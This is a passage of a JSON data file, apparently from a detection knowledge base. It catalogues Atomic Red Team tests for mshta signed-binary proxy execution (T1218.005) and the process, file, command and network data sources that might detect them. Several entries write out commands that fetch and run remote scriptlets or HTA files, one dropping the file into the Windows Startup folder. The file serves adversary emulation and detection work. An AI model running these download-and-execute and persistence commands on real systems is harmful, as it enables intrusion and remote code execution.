javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();\n", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -file PathToAtomicsFolder\\T1218.005\\src\\powershell.ps1\"\":close\")\n", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "$var =Invoke-WebRequest \"#{hta_url}\"\n$var.content|out-file \"$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1218.005.hta\"\nmshta \"$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1218.005.hta\"\n", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "$var =Invoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/T1218.005.hta\"\n$var.content|out-file \"#{temp_file}\"\nmshta \"#{temp_file}\"\n", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine JScript -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path}", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -HTAFilePath Test.hta -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path}", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath $env:windir\\system32\\mshta.exe", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine JScript -SimulateUserDoubleClick", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -HTAFilePath Test.hta -ScriptEngine #{script_engine} -SimulateUserDoubleClick", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath $env:windir\\system32\\mshta.exe", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -HTAUri https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta -MSHTAFilePath #{mshta_file_path}", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath $env:windir\\system32\\rundll32.exe", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -ScriptEngine JScript -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler About -UseRundll32 -Rundll32FilePath #{rundll32_file_path}", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath $env:windir\\system32\\mshta.exe", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -ScriptEngine JScript -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath #{mshta_file_path}", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler About -MSHTAFilePath #{mshta_file_path}", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath $env:windir\\system32\\mshta.exe", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "mshta.exe \"about:'\"\n", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": null, + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1218.005", + "display_name": "Signed Binary Proxy Execution: Mshta", + "atomic_tests": [ + { + "name": "Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject", + "auto_generated_guid": "1483fab9-4f52-4217-a9ce-daa9d7747cae", + "description": "Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_url": { + "description": "location of the payload", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct" + } + }, + "executor": { + "command": "mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();\n", + "name": "command_prompt" + } + }, + { + "name": "Mshta executes VBScript to execute malicious command", + "auto_generated_guid": "906865c3-e05f-4acc-85c4-fbc185455095", + "description": "Run a local VB script to run local user enumeration powershell command.\nThis attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems.\nUpon execution, a new PowerShell windows will be opened that displays user information.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -file PathToAtomicsFolder\\T1218.005\\src\\powershell.ps1\"\":close\")\n", + "name": "command_prompt" + } + }, + { + "name": "Mshta Executes Remote HTML Application (HTA)", + "auto_generated_guid": "c4b97eeb-5249-4455-a607-59f95485cb45", + "description": "Execute an arbitrary remote HTA. Upon execution calc.exe will be launched.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "temp_file": { + "description": "temp_file location for hta", + "type": "String", + "default": "$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1218.005.hta" + }, + "hta_url": { + "description": "URL to HTA file for execution", + "type": "String", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/T1218.005.hta" + } + }, + "executor": { + "command": "$var =Invoke-WebRequest \"#{hta_url}\"\n$var.content|out-file \"#{temp_file}\"\nmshta \"#{temp_file}\"\n", + "cleanup_command": "remove-item \"#{temp_file}\" -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement", + "auto_generated_guid": "007e5672-2088-4853-a562-7490ddc19447", + "description": "Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "script_engine": { + "description": "Script Engine to use", + "type": "String", + "default": "JScript" + }, + "hta_file_path": { + "description": "HTA file name and or path to be used", + "type": "String", + "default": "Test.hta" + }, + "mshta_file_path": { + "description": "Location of mshta.exe", + "type": "String", + "default": "$env:windir\\system32\\mshta.exe" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path}", + "name": "powershell" + } + }, + { + "name": "Invoke HTML Application - Jscript Engine Simulating Double Click", + "auto_generated_guid": "58a193ec-131b-404e-b1ca-b35cf0b18c33", + "description": "Executes an HTA Application using JScript script engine simulating double click.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "script_engine": { + "description": "Script Engine to use", + "type": "String", + "default": "JScript" + }, + "hta_file_path": { + "description": "HTA file name and or path to be used", + "type": "String", + "default": "Test.hta" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -SimulateUserDoubleClick", + "name": "powershell" + } + }, + { + "name": "Invoke HTML Application - Direct download from URI", + "auto_generated_guid": "39ceed55-f653-48ac-bd19-aceceaf525db", + "description": "Executes an HTA Application by directly downloading from remote URI.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "mshta_file_path": { + "description": "Location of mshta.exe", + "type": "String", + "default": "$env:windir\\system32\\mshta.exe" + }, + "hta_uri": { + "description": "URI to HTA", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}", + "name": "powershell" + } + }, + { + "name": "Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler", + "auto_generated_guid": "e7e3a525-7612-4d68-a5d3-c4649181b8af", + "description": "Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "rundll32_file_path": { + "description": "Location of rundll32.exe", + "type": "Path", + "default": "$env:windir\\system32\\rundll32.exe" + }, + "script_engine": { + "description": "Script Engine to use", + "type": "String", + "default": "JScript" + }, + "protocol_handler": { + "description": "Protocol Handler to use", + "type": "String", + "default": "About" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}", + "name": "powershell" + } + }, + { + "name": "Invoke HTML Application - JScript Engine with Inline Protocol Handler", + "auto_generated_guid": "d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840", + "description": "Executes an HTA Application with JScript Engine and Inline Protocol Handler.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "mshta_file_path": { + "description": "Location of mshta.exe", + "type": "Path", + "default": "$env:windir\\system32\\mshta.exe" + }, + "script_engine": { + "description": "Script Engine to use", + "type": "String", + "default": "JScript" + }, + "protocol_handler": { + "description": "Protocol Handler to use", + "type": "String", + "default": "About" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath #{mshta_file_path}", + "name": "powershell" + } + }, + { + "name": "Invoke HTML Application - Simulate Lateral Movement over UNC Path", + "auto_generated_guid": "b8a8bdb2-7eae-490d-8251-d5e0295b2362", + "description": "Executes an HTA Application with Simulate lateral movement over UNC Path.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "mshta_file_path": { + "description": "Location of mshta.exe", + "type": "String", + "default": "$env:windir\\system32\\mshta.exe" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}", + "name": "powershell" + } + }, + { + "name": "Mshta used to Execute PowerShell", + "auto_generated_guid": "8707a805-2b76-4f32-b1c0-14e558205772", + "description": "Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "message": { + "description": "Encoded message to include", + "type": "String", + "default": "Hello,%20MSHTA!" + }, + "seconds_to_sleep": { + "description": "How many seconds to sleep/wait", + "type": "Integer", + "default": 5 + } + }, + "executor": { + "command": "mshta.exe \"about:'\"\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" 